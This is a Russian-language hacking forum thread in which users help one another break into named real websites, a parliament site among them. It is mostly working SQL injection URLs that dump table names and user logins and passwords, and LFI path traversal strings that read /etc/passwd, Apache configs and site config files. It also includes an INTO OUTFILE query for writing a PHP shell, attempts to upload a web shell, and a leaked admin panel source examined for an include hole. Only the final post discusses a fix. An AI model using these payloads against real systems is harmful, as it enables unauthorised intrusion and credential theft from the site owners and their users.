5 ветка и вывод очень удобный, вся инфа сразу на одной странице.

jecka3000
в 4-х скулях подбор таблиц и колонок происходит подбором. Здесь это написано
https://forum.antichat.ru/threadnav43966-1-10.html

для автоматизации (брутфорс таблиц,колонок из словоря), можно использоваться SIPT4
что касается таблиц, в первую очередь следует проверять такие как: user, users,admin,admins,member,members,accounts,profile s,etc (если конечно, Вас интересуют эти данные ;) )

Да

http://times.ua/search/results/?keyword=1'+and+1=2+union+select+1,2,3,table_name+ from+information_schema.tables--+

5 ветка и вывод очень удобный, вся инфа сразу на одной странице.
Спасибо. Я пробовал подставлять так - http://times.ua/search/results/?keyword=1'/*, т.е. отсечь все лишнее, но ошибка выводилась, поэтому и не подбирал.

Хочу понять как искать логи апача через
/proc/self/status
К примеру
http://www.amp.edu.pl/eng/index.php?strona=../../../../../../../../proc/self/status%00

Name: httpd2-prefork State: R (running) SleepAVG: 88% Tgid: 14786 Pid: 14786 PPid: 5965 TracerPid: 0 Uid: 30 30 30 30 Gid: 260 260 260 260 FDSize: 64 Groups: 260 VmPeak: 148096 kB

Pid: 14786 - но при каждом обновлении страницы он меняется.

http://www.amp.edu.pl/eng/index.php?strona=../../../../../../../../proc/14786/fd/7%00

Выдаёт что такого файла нет (%{FD_ID} - пробовал менять).

Напишите эксплуатацию этой техники поподробней, пожалуйста

Спасибо. Я пробовал подставлять так - http://times.ua/search/results/?keyword=1'/*, т.е. отсечь все лишнее, но ошибка выводилась, поэтому и не подбирал.
просто и "/*" и "--" знаки начала комментария )

farpost
Ты не внимательно читал материал. Там после поста c411k идут комментарии, и я уже писал, что через PID ненадо это делать.

proc/self/ - это и есть ссылка на твой PID
а
proc/self/fd/ - директория с файлами твоего процесса

Тоесть вместо того, чтобы искать пид и заморачиваться с ним, можно обратиться напрямую.

proc/self/fd/x

x подбирай уже ручками, он числовой

farpost
pid процесаа знать не обязательно, в /proc есть ссылка "self" на текущий pid процесса
/proc/self/environ
/proc/self/fd/2
только в твоём примере прав на чтение нету

http://milw0rm.com/papers/341
Вот вышло достаточно неплохое если можно так выразиться HOWTO, прочитал, в общем-то понравилось, всё в одном месте.
Рекомендую прочитать, особенно новичкам. Много примеров (правда самых простых).
ну и конечно язык английский, но там всё понятно.

Вопрос такой, написал сканер для поиска логов. Взял пути из одной темы (вот кусочек).


../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log

Я правильно понимаю что их все можно заменить на

../../../../../../../../../../../../../../../../../../apache/logs/error.log

Если нет то почему, ведь выше / не подняться

../../ - их количество зависит от того, насколько глубоко у вас засунут сайт.
Т.е. их количество на разных хостингах не статично :)

ответ: можно :)

Спасибо. Ещё сразу вопрос назрел. Сделал сканер для поиска конфигов апача. Решение о нахождении пути принимается на основе наличия в выдаче строки

ErrorLog

Такой подход правильный?

Вопрос такой, написал сканер для поиска логов. Взял пути из одной темы (вот кусочек).

Я правильно понимаю что их все можно заменить на

Если нет то почему, ведь выше / не подняться
.. в никсах означает переход на каталог выше.
../../ это переход на 2 каталога выше.
Если ты хочешь просмотреть файл, выдимый из интернета, то корневая директория / - эта (site.ru/корневая)


../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
эти файлы не видны из веба!!!
Их можно прочесть, если у тебя есть php-include или sql-injection+file_priv. В этом случае путь будет выглядеть следующим образом, например, site.ru/index.php?file=../../../../apache/logs/error.log.

DocumentRoot можно
но это не важно, главное искать уникальную строку

просто и "/*" и "--" знаки начала комментария )
Я знаю об этом. Я отсекал ими лишние данные, т.е. незакрытую кавычку.

AFoST, спасибо, имел ввиду как раз сканер LFI. Суть вопроса была в том чтобы минимизировать число запросов, подставляя в начало большое кол-во ../. Теперь разобрался

AFoST, спасибо, имел ввиду как раз сканер LFI. Суть вопроса была в том чтобы минимизировать число запросов, подставляя в начало большое кол-во ../. Теперь разобрался
угу. прости, не понял тебя сразу.

http://ship-viking.ru/index.php?id=65 Очень подозрительный УРЛ, пробовал с конструкцией AND и метод вычислений, но ошибку упорно не хочет выводить, подскажите, в чем тут дело?

Значит нету инъекции.

jecka3000
что подозрительного в этом урле?
нет там инъекции.
или вы считаете что все скрипты, которые имеют ?id=x имеют инъекцию?

Значит нету инъекции. Глупости, отсутствие вывода ошибки не говорит об отсутствии инъекции. К примеру выше не относится, посмотреть сейчас не могу.

Глупости, отсутствие вывода ошибки не говорит об отсутствии инъекции. К примеру выше не относится, посмотреть сейчас не могу.Я имел в виду конкретный случай

возможно стоит проверить арифметикой

http://ship-viking.ru/index.php?id=65 Очень подозрительный УРЛ, пробовал с конструкцией AND и метод вычислений, но ошибку упорно не хочет выводить, подскажите, в чем тут дело?
Ну во первых там отключён вывод ошибок Mysql а во вторых mfv уязвимости нет.

Нашёл LFI. Нашёл логи апача

http://www.imaf.co.uk/content.php?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00

Нужный виртуал хост

DocumentRoot /home/web/imaf ServerName imaf.co.uk <Directory "/home/web/imaf"> allow from all Options +Indexes </Directory> ServerAlias www.imaf.co.uk

ErrorLog logs/error_log

Но логи почему то не выводятся по такому запросу:

http://www.imaf.co.uk/content.php?page=../../../../../../../../../../../../../../etc/httpd/logs/error_log%00

В чём причина?

1. Нет прав на чтение
2. Даже на /etc/passwd бывает фейки суют

http://www.imaf.co.uk/content.php?page=../../../../../../../../../../../../../../etc/passwd%00

Почему решили что фейк? И лог тоже фейковый?

Реально видел, правда один раз, сам админ написал при ../etc/passwd - "это фейк:)", скорее всего нет прав на чтение

и потом, logs/error_log вовсе не означает, что это тут:

/etc/httpd/logs/error_log

Тогда относительно чего же этот путь
logs/error_log

http://www.imaf.co.uk/content.php?page=../../../../../../../../../../../../../../home/web/imaf/imaf-forum/config.php%00

все там норм, никакого фейка..логи ищи. Поиск тебе в руки, была тема еttee.

Логов по стандартным путям из темы http://forum.antichat.ru/thread49775.html не нашлось

Можно ли залить shell сюда?

http://egechita.ru/documents/show_doc.php?doc=68&type=federalsfhjdgj

2 вопрос

/home/www/egechita/documents/show_doc.php

вот структура сайта.

Что я могу ещё полезного вытащить кроме етк/пасс?

сервер *nix

Скорпиончик
Вот там еще нашел http://egechita.ru/news/show_news.php?id_news=56+union+select+1,concat_ws( 0x3a,login,pass),3,4,5+from+user+limit+1,1/*
пятая ветка

я это находил. эти нечего не дают пассы. надо шелл залить

попробуй INTO OUTFILE и ищи папку с правами на запись

попробуй INTO OUTFILE и ищи папку с правами на запись

подскадите как составить запрос на запись файла.

например:
http://egechita.ru/news/show_news.php?id_news=-1+UNION+SELECT+1,2,3,4,5+INTO+OUTFILE+'/tmp/shell.php'+--+

мб пригодится
http://egechita.ru/documents/show_doc.php?doc=../../../../../../../../etc/httpd/conf/httpd.conf

Fuckel

Я вот одного не пойму, зачем советовать то, что не будет работать?
Для записи в файл нужны права, а там их нет у юзера

Скорпиончик Сначала нужно почитать что-то , а потом по прочтению задавать вопросы. Статей куча на форуме

я посоветовал ему попробывать, не утверждал что будет работать

Можно ли залить shell сюда?
http://egechita.ru/documents/show_doc.php?doc=68&type=federalsfhjdgj
2 вопрос
/home/www/egechita/documents/show_doc.php
вот структура сайта.
Что я могу ещё полезного вытащить кроме етк/пасс?
сервер *nix

Можно получить доступ к приватной инфо, кое-что почитать и прочитав нужное сделать таки своё грязное дело:)


http://egechita.ru/documents/show_doc.php?doc=68&type=../../../../../home/www/egechita/forum/.htaccess%00


плюс там есть сессии в куках, зарегится везде, где только можно, выкупить путь хранения сессий и посмотреть, что выдаст

там кстати PHPBB3, шелл там льется элементарно, если попасть в админку

ЗЫЖ А можно поискать логи и не париться:)

спс, может ктонить знает какиенить эксплоиты для phpbb3. Подскажите плиз.
какиенибудь ссылки. Уж очень хочиться проникнуть в серв.

https://forum.antichat.ru/thread24488.html

2 Скорпиончик

http://egechita.ru/documents/show_doc.php?doc=68&type=../../../../../etc/httpd/conf/httpd.conf%00

Конфиг апача. Видим что есть еще два хоста temp.egechita.ru и online.egechita.ru

смотрим online.egechita.ru и видим

http://online.egechita.ru/?theme=-7+union+select+1,2,3,4,5--

SQL injection

Хеш админа форума доступен

Какие системные и *несистемные* таблицы есть в PostgreSql ? information_schema там вообще нету

Какие системные и *несистемные* таблицы есть в PostgreSql ? information_schema там вообще нету

http://www.postgresql.org/docs/8.3/static/catalogs.html

Гуру, не пойму, можно ли залить шелл с помощью этой формы?
http://www.parliament.ge/adm_includes/editor/file_manager.php

Так же не пойму, то ли форма фильрует рисунки то ли удаляет файл

Выложи код той формы и тебе всё подробно расскажут)

Гуру, не пойму, можно ли залить шелл с помощью этой формы?
http://www.parliament.ge/adm_includes/editor/file_manager.php

Так же не пойму, то ли форма фильрует рисунки то ли удаляет файл
попробовал загрузить картинку обычную и с шелл измененным расширением. Результат аналогичен.
Но возможно нужно что бы картинка была определенных размеров.
Еще арабский блин...

Гуру, не пойму, можно ли залить шелл с помощью этой формы?
http://www.parliament.ge/adm_includes/editor/file_manager.php

Так же не пойму, то ли форма фильрует рисунки то ли удаляет файл
Фильтрует на расширение причем нулбайт не прокатывает,я бы поковырял но уж слишком до него далеко, ответ долго идет пинг большой... :(

Warning</b>: include(phpBB2/.................................................. .................................................. .................................................. .................................................. .................................................. .................................................. .................................................. .................................................. .................................................. .................................................. .................................................. ................................/home/www/site.ru/forum//forum.php) [<a href='function.include'>function.include</a>]: failed to open stream: File name too long in <b>/home/www/site.ru/forum/forum.php</b> on line <b>292</b><br />

Тиичный инклуд с фильтрацией кавычек.Что я не так делаю ? Или тут не получится ?

Warning</b>: include(phpBB2/.................................................. .................................................. .................................................. .................................................. .................................................. .................................................. .................................................. .................................................. .................................................. .................................................. .................................................. ................................/home/www/site.ru/forum//forum.php) [<a href='function.include'>function.include</a>]: failed to open stream: File name too long in <b>/home/www/site.ru/forum/forum.php</b> on line <b>292</b><br />

Тиичный инклуд с фильтрацией кавычек.Что я не так делаю ? Или тут не получится ?

Читай текст ошибки "File name too long" - слишком длинное имя файла =\

Велемир, исходники формы не достать - она в PHP, а его слить не получается.

--StraNger--, это грузинский :)
Может глаза замылились, добыл исходник admpan.php :)
Тут за что-нибудь зацепиться можно?

<?
ob_start();
session_start();
include_once("inc_all.php");

// GARSE
// checking who can enter this page
if(!$auth->grant_access_for(array(1,2,10))){ // passing array with user statuses who can enter this page
die("Access Denied for User ".$_SESSION['user_data']['user_name']);
}
// /GARSE

if ($_GET['set_language']) {
$_SESSION['admpan_lang'] = $_GET['set_language'];
header ("Location: ".$conf['site_url']."admpan.php?adm_do=".$_GET['adm_do']);
}

if (!$_SESSION['admpan_lang']) $adm_css = $conf['adminpanel_lang'];
else $adm_css = $_SESSION['admpan_lang'];

//language
require("adm_includes/lang/".$adm_css.".php");

$all_menu_types = $conf['all_menu_types'];

$all_admin_lang_ver = explode (",", $conf['admin_lang_ver']);
$adm_lan_str = '';
foreach ($all_admin_lang_ver as $v) {
if ($v==$adm_css) $cssstyle = 'style="background-color:#ff6600;"';
else $cssstyle = '';
$adm_lan_str .= '<a href="?set_language='.$v.'" '.$cssstyle.'>&nbsp;'.strtoupper($v).'&nbsp;</a>&nbsp;&nbsp;';
}

require($conf['default_skin']."adm/header.php");
switch ($_GET['adm_do']) {
case 'menu':
require("adm_includes/menu.php");
break;
case 'menu_management':
require("adm_includes/menu_management/menu_management.php");
break;
case 'users_menagement':
require("adm_includes/users/users.php");
break;
case 'site_map':
require("adm_includes/site_map.php");
break;
case 'log':
require("adm_includes/log/log_view.php");
break;
case 'banners':
require("adm_includes/banners/view_banners.php");
break;
case 'stat':
require("adm_includes/stat/stat.php");
break;
case 'system_info':
require("adm_includes/sys_info.php");
break;
case 'poll':
require("modules/poll/poll_admin.php");
break;
case 'newsletter':
require("modules/newsletter/newsletter_admin.php");
break;
case 'blocks':
require("adm_includes/blocks/blocks.php");
break;
case 'blocks_gaert':
require("_special/blocks_gaert.php");
break;
case 'parl':
require("_special/parl/adm/parl.php");
break;
case 'kan':
require("_special/kan/adm/kan.php");
break;
case 'news_main':
require("adm_includes/news_main.php");
break;
case 'users_permissions':
require("adm_includes/users_permissions.php");
break;
case 'langmng':
require("adm_includes/language_management/language_management.php");
break;
case 'log_events':
require("adm_includes/log_events.php");
break;
case 'single_pages':
require("adm_includes/adm_single_pages.php");
break;
case 'single_pages_folder':
require("adm_includes/adm_single_page_folders.php");
break;
case 'replace':
require("adm_includes/replace/replace.php");
break;
case 'rss':
require("adm_includes/rss/rss_adm.php");
break;
case 'db_management':
require("adm_includes/db_management/dumper.php");
break;
case 'currency':
require("adm_includes/currency/currency.php");
break;
default:
//require("adm_includes/default.php");
/*header ("Location: admpan_top.php?adm_do=menu_menagement");
exit;*/
require($conf['default_skin']."adm/default.php");
}
require($conf['default_skin']."adm/footer.php");
ob_end_flush();
?>

LFI в $_GET['set_language'] при magic_quotes_gpc=off либо при рабочем обходе со слешами

if ($_GET['set_language']) {
$_SESSION['admpan_lang'] = $_GET['set_language'];
header ("Location: ".$conf['site_url']."admpan.php?adm_do=".$_GET['adm_do']);
}
if (!$_SESSION['admpan_lang']) $adm_css =$conf['adminpanel_lang'];
else $adm_css = $_SESSION['admpan_lang'];


//language
require("adm_includes/lang/".$adm_css.".php");

либо сразу в $_SESSION['admpan_lang'], разницы нет

Spyder, пропатченным я его обратно залить не смогу, что делать-то?

всмысле пропатченным?
и всмысле что делать?

как защититься или что?

чтобы защититься можно отредактировать скрипт, прогнав adm_css через preg_match на соответствие шаблону [a-z]
Если нет возможности редактировать(почему?) включить в пшп magic_quotes, open_basedir, safe_mod + всякую гадость, хотя я сомневаюсь что у тебя есть права на php.ini, а на сам скрипт нет, ктому же этот способ не спасёт на 100%